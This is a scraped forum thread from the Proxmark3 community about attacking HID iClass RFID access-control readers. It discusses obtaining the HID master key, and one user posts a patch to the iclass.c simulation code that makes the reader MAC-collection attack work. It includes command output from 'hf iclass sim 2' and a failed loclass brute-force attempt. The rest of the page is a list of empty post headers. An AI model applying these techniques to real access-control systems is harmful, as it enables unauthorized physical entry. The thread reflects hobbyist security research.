If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers. A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.
Aydiosmio wrote:
It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".]
The newer iClass SE readers use a slightly different communication sequence when talking to a credential. I suspect that the "Unknown Command" problem that you are experiencing is a result of the SE reader using a four block (32-byte) "Read4" command. The legacy iclass readers only used single block (8-byte) read commands.
One thing that I noticed with the SE readers is that if the credential does not respond to a 32-byte read command then the reader firmware will simply timeout and then retry using single block (8-byte) read operation. Unfortunately the PM3 appears to be halting after receipt of the unsupported "Read4" (32-byte) read command.

can i get master key please help me?

asper · 2015-11-04 14:53:08

Unless you are able to extract it yourself NO, you cannot have it.

key · 2015-11-07 03:24:44

asper wrote:

Unless you are able to extract it yourself NO, you cannot have it.

ok i will try
please teach me how to make myself

Piorun · 2015-11-07 12:13:19

key wrote:

ok i will try
please teach me how to make myself

here is SbS guide: http://www.openpcd.org/images/HID-iCLASS-security.pdf
but you need to have RW400 reader

Piorun · 2015-11-09 20:31:18

I'm wonder why I get the error 'Unknown command received from reader (len=4): c'

#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c

I have new FPGA (2.4.0):

C:\>proxmark3.exe com3
Qt: Untested Windows version 6.2 detected!
Prox/RFID mark3 RFID instrument
bootrom: /-suspect 2015-11-04 22:15:34
os: /-suspect 2015-11-07 20:05:15
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2015/11/ 2 at  9: 8: 8

Command should be hadled by the code (iclasss.c):

		} else if(simulationMode == MODE_FULLSIM && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){
			//Read block
			uint16_t blk = receivedCmd[1];
			//Take the data...
			memcpy(data_generic_trace, emulator+(blk << 3),8);
			//Add crc
			AppendCrc(data_generic_trace, 8);
			trace_data = data_generic_trace;
			trace_data_size = 10;
			CodeIClassTagAnswer(trace_data , trace_data_size);
			memcpy(data_response, ToSend, ToSendMax);
			modulated_response = data_response;
			modulated_response_size = ToSendMax;

simulationMode = 2 <- MODE_FULLSIM
receivedCmd[0] = 0xC <- ICLASS_CMD_READ_OR_IDENTIFY
len = 4

but instead of the above code, the command is handled by this part :

else {
			//#db# Unknown command received from reader (len=5): 26 1 0 f6 a 44 44 44 44
			// Never seen this command before
			Dbprintf("Unknown command received from reader (len=%d): %x %x %x %x %x %x %x %x %x",
			len,

Any idea what is going wrong ?

Last edited by Piorun (2015-11-09 20:31:43)

marshmellow · 2015-11-09 21:26:51

main reason:
your output says "Going into attack mode" this is not full sim but reader attack mode. so simulationMode = 1 = MODE_EXIT_AFTER_MAC

Piorun · 2015-11-09 21:39:38

marshmellow wrote:

main reason:
your output says "Going into attack mode" this is not full sim but reader attack mode. so simulationMode = 1 = MODE_EXIT_AFTER_MAC

so command ' hf iclass sim 2' run mode = 1 ?

proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c

---- Update ---
Thx for explanation

	else if(simType == 2)
	{

		uint8_t mac_responses[USB_CMD_DATA_SIZE] = { 0 };
		Dbprintf("Going into attack mode, %d CSNS sent", numberOfCSNS);
		int i = 0;
	.....
		cmd_send(CMD_ACK,CMD_SIMULATE_TAG_ICLASS,i,0,mac_responses,i*8);

	}else if(simType == 3){
		//This is 'full sim' mode, where we use the emulator storage for data.
		doIClassSimulation(MODE_FULLSIM, NULL);

So how I should handle this 'unknown cmd' ?

Last edited by Piorun (2015-11-09 21:54:20)

Piorun · 2015-11-12 18:21:30

I did the 'fix'

if((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC) && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){

and can obtain 15 MACs

proxmark3> hf icla sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# CSN: 00 0b 0f ff f7 ff 12 e0
#db# RDR:  (len=09): 05 cf 57 30 21 5f xx xx xx
#db# Simulating CSN 00040e08f7ff12e0
#db# CSN: 00 04 0e 08 f7 ff 12 e0
#db# RDR:  (len=09): 05 6f f0 ee f8 24 xx xx xx
...
#db# Simulating CSN 00050121f7ff12e0
#db# CSN: 00 05 01 21 f7 ff 12 e0
#db# RDR:  (len=09): 05 9f 65 d0 03 8e xx xx xx
#db# Done...
Mac responses: 15 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-1.bin'
proxmark3>

how ever the brute force attack doesn't work

proxmark3> hf iclass loclass f iclass_mac_attack-2.bin
Bruteforcing byte 1
Bruteforcing byte 0
Bruteforcing byte 69
1234567891011
...
42452462472482492502512522532542550 Failed to recover 3 bytes using the following CSN
CSN = 000b0ffff7ff12e0
The CSN requires > 3 byte bruteforce, not supported
CSN = 00040e08f7ff12e0
HASH1 = 7802000045014545
The CSN requires > 3 byte bruteforce, not supported
CSN = 00090d05f7ff12e0
HASH1 = 7b0300004501xxxx

Proxmark3 community

Announcement

#151 2015-04-25 18:47:41

Re: iClass is coming...

#152 2015-04-26 00:07:31

Re: iClass is coming...

#153 2015-05-10 16:33:02

Re: iClass is coming...

#154 2015-05-14 21:06:24

Re: iClass is coming...

#155 2015-05-15 01:16:34

Re: iClass is coming...

#156 2015-05-15 13:23:42

Re: iClass is coming...

#157 2015-05-16 10:27:01

Re: iClass is coming...

#158 2015-06-01 15:39:50

Re: iClass is coming...

#159 2015-06-19 02:48:57

Re: iClass is coming...

#160 2015-06-19 02:50:03

Re: iClass is coming...

#161 2015-07-12 09:30:01

Re: iClass is coming...

#162 2015-07-12 23:37:25

Re: iClass is coming...

#163 2015-07-13 05:36:00

Re: iClass is coming...

#164 2015-07-19 06:57:58

Re: iClass is coming...

#165 2015-07-19 12:41:15

Re: iClass is coming...

#166 2015-07-19 14:26:49

Re: iClass is coming...

#167 2015-07-19 15:24:22

Re: iClass is coming...

#168 2015-07-19 15:25:17

Re: iClass is coming...

#169 2015-07-20 15:50:36

Re: iClass is coming...

#170 2015-07-20 19:20:32

Re: iClass is coming...

#171 2015-07-20 19:30:11

Re: iClass is coming...

#172 2015-07-20 21:40:16

Re: iClass is coming...

#173 2015-07-20 21:46:31

Re: iClass is coming...

#174 2015-07-20 21:51:09

Re: iClass is coming...

#175 2015-07-21 14:52:56

Re: iClass is coming...

#176 2015-07-21 18:05:04

Re: iClass is coming...

#177 2015-07-21 18:42:49

Re: iClass is coming...

#178 2015-07-21 19:15:24

Re: iClass is coming...

#179 2015-07-21 19:34:01

Re: iClass is coming...

#180 2015-07-21 19:39:52

Re: iClass is coming...

#181 2015-07-21 23:16:44

Re: iClass is coming...

#182 2015-09-15 02:30:47

Re: iClass is coming...

#183 2015-09-26 15:58:46

Re: iClass is coming...

#184 2015-10-13 09:15:47

Re: iClass is coming...

#185 2015-10-29 10:18:39

Re: iClass is coming...

#186 2015-10-30 11:20:47

Re: iClass is coming...

#187 2015-11-02 23:05:49

Re: iClass is coming...

#188 2015-11-03 00:55:47

Re: iClass is coming...

#189 2015-11-03 18:52:11

Re: iClass is coming...